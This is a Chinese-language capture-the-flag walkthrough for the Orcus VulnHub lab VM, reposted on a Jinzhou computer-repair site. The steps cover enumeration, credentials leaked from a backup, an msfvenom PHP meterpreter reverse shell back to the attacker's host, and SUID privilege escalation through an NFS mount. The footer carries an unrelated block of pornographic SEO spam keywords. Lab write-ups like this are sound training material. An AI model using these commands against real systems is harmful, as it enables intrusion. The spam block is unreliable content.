錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務,錦州廣廈維修電腦,公司IT外包服務
topFlag1 設為首頁
topFlag3 收藏本站
 
maojin003 首 頁 公司介紹 服務項目 服務報價 維修流程 IT外包服務 服務器維護 技術文章 常見故障
錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務技術文章
挑戰關于Orcus VM的解題步驟

作者: 佚名  日期:2017-05-11 14:51:18   來源: 本站整理

 前言
各位朋友,今天我們將要挑戰的是由Mr. Viper為vulnerable hub設計的“ORCUS”奪旗挑戰賽。本次挑戰賽中包含了4部分:
獲取Shell
獲取root權限
獲取flag
自由發揮尋找隱藏flag
下載傳送門 SHA-256 : 79B1D93C60E664D70D8EB3C0CDF1AD98BF2B95036C84F87EEF065FA71C1AE51E
探索頻道
192.168.0.151是我們目前已知的目標IP,收集目標信息的第一步就需要進行枚舉,因此使用慣用手法使用nmap掃描其版本。 
nmap -p- -sV 192.168.0.151
從截圖中你可以看出目標開放了許多端口,但我們現在只需要關注80端口就好。 

得知目標開放80端口,因此我們通過瀏覽器打開目標IP 192.168.0.151,但是沒有收獲。 

為了不浪費寶貴時間,我選擇了另一款名為dirb的工具對目錄進行暴力破解。在終端鍵入如下命令: 
dirb http://192.168.0.151
ok大方向正確,并且我們挖出了許多目錄。特別是注意下面截圖中我高亮標注的backups目錄,接下來我們就看看該目錄有沒有驚喜。 

在瀏覽器中鍵入192.168.0.151/backups,其中我發現一個名為simple PHP Quiz-backup.tar.gz的tar文件。下載保存到本地,以供后面分析

解壓后發現其中包含php和html文件,我的小眼睛一瞄,名為db-conn.php的文件其中會不會有數據庫相關的東西呢? 

做了許多努力,最后發現dbuser,dbpasswords分別為數據庫的用戶名和密碼。 

在此之前我們就挖到很多目錄,如果你返回前面截圖還可以注意到phpmyadmin目錄。接著我們在瀏覽器中鍵入192.168.0.1.51/phpmyadmin,鍵入上一步獲得數據庫用戶名以及密碼 

正確輸入用戶名密碼,進入phpmyadmin管理頁面。其中發現名為zenphoto的數據庫,進去瞧瞧吧。 

在zenphoto數據庫中發現一個設置頁面可用于更新數據庫配置文件,在文本框區域填入我們的信息。 

此處,我們填入數據庫用戶名dbuser和數據庫密碼dbpassword,其他直接默認就好 

當點擊頁面下端的GO按鈕便開始安裝,在安裝完成之后會要求你設置管理員賬戶及密碼 

單擊繼續按鈕,同意給出服務條款

創建管理員用戶就不過多敘述,之后點擊頁面頂部的應用按鈕就好。

使用創建的管理員賬戶登錄zenphoto數據庫,進入管理控制臺之后我們可以選擇上傳圖片,但這里我們僅上傳zip文件 

鍵入以下命令,使用msfvenom生成惡意PHP腳本: 

msfvenom –p php/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 –f raw
從截圖你可以看到生成的惡意PHP腳本,此刻我們需要復制高亮標注的部分代碼。之后將其粘貼到文本文檔,保存為shell.php。最后新建一個文件夾,將shell.php放入其中,然后將其進行壓縮。 最重要的是記得開啟metasploit中的multi handler 

回到瀏覽器以上傳我們的zip文件,之后探尋192.168.0.151/zenphoto/albums內的信息。從下面的截圖中可以看出我們成功上傳shell.php 

單擊shell.php,我們獲得metasploit內的meterpreter會話,鍵入以下命令獲取flag: 
Meterpreter >cd /var/www
Meterpreter >ls
Meterpreter >cat flag.txt
獲得第一個flag 

經過不懈努力,我在kippo文件夾中進一步發現許多信息 
Meterpreter >pwd
Meterpreter >cd ..
Meterpreter >cat etc/kippo/data/userdb.txt
獲得第二個flag 

接下來獲取root權限,在文本文檔中引用https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/#suid-binary 中的內容。 之后將其另存為raj.c

上傳編譯好的raj.c文件獲取root權限,如下圖 
Meterpreter >upload/root/Desktop/raj.c
Meterpreter >shell
gcc -o raj raj.c

從nmap的掃描結果中我們知道目標ip的nfs端口已開放,利用這個點我們可以在Kali Linux中抓取其掛載的tmp數據 
mount -t nfs 192.168.0.151:/tmp mount
Chown root: root raj
Chmod u+s raj

./raj
Id
Cd /root
Cat flag.txt
獲得第三個flag

最后就靠你自由發揮找到其他flag咯
 



熱門文章
  • 機械革命S1 PRO-02 開機不顯示 黑...
  • 聯想ThinkPad NM-C641上電掉電點不...
  • 三星一體激光打印機SCX-4521F維修...
  • 通過串口命令查看EMMC擦寫次數和判...
  • IIS 8 開啟 GZIP壓縮來減少網絡請求...
  • 索尼kd-49x7500e背光一半暗且閃爍 ...
  • 樓宇對講門禁讀卡異常維修,讀卡芯...
  • 新款海信電視機始終停留在開機界面...
  • 常見打印機清零步驟
  • 安裝驅動時提示不包含數字簽名的解...
  • 共享打印機需要密碼的解決方法
  • 圖解Windows 7系統快速共享打印機的...
  • 錦州廣廈電腦上門維修

    報修電話:13840665804  QQ:174984393 (聯系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號:遼ICP備2023002984號-1
    上門服務區域: 遼寧錦州市區
    主要業務: 修電腦,電腦修理,電腦維護,上門維修電腦,黑屏藍屏死機故障排除,無線上網設置,IT服務外包,局域網組建,ADSL共享上網,路由器設置,數據恢復,密碼破解,光盤刻錄制作等服務

    技術支持:微軟等
    主站蜘蛛池模板: 精品人体无码一区二区三区| 少妇人妻偷人精品无码AV| 在线高清无码A.| 精品亚洲AV无码一区二区三区| 亚洲Av永久无码精品黑人| 国产精品无码成人午夜电影| 色国产色无码色欧美色在线| 在线播放无码后入内射少妇| 国产成人无码A区精油按摩 | 久久久久无码精品国产app| 中文字幕无码AV波多野吉衣| 久久久久无码精品国产h动漫| 精品无码成人片一区二区98| 国产Av激情久久无码天堂| 无码国模国产在线无码精品国产自在久国产 | 国产怡春院无码一区二区| 亚洲av无码av制服另类专区| 国产成人无码A区在线观看视频| 人妻aⅴ中文字幕无码| 精品无码国产一区二区三区AV | 精品久久久久久无码中文野结衣| 无码av最新无码av专区| 国产成年无码久久久久毛片| 成人无码视频97免费| 人妻少妇无码视频在线| 免费无码黄网站在线观看| 国产福利无码一区在线| 国产精品午夜无码av体验区| 久久久久久亚洲精品无码| 性色av极品无码专区亚洲| 免费无码看av的网站| aⅴ一区二区三区无卡无码 | 中文字幕av无码一二三区电影| 无码精品国产VA在线观看| 亚洲av无码专区在线播放| 十八禁无码免费网站| 91无码人妻精品一区二区三区L| 综合无码一区二区三区四区五区| 麻豆国产精品无码视频| 无码任你躁久久久久久| 无码色AV一二区在线播放|